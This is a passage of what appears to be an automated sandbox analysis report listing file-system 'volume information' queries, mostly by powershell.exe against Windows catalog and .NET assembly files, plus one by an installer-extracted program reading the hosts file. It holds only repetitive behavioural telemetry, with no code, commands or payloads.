Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
